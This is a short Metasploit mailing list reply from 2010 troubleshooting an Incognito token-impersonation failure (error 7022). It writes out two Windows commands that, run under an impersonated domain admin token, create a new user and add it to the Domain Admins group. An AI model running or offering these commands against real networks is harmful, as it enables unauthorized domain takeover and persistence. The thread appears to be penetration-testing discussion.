Metasploit mailing list archives

Re: Incognito Operation failed: 7022

From: troy () defendit com au
Date: Mon, 1 Feb 2010 19:15:33 +1100 (EST)

It's failing to load cmd.exe as a Domain Admin on the client. Therefor not
possible to issue the commands.

Can you impersonate the token of a domain admin on a client then issue
these commands to add a domain admin to the pdc from the client.

NET USER {username} {password} /DOMAIN /ADD
NET GROUP "domain admins" {username} /DOMAIN /ADD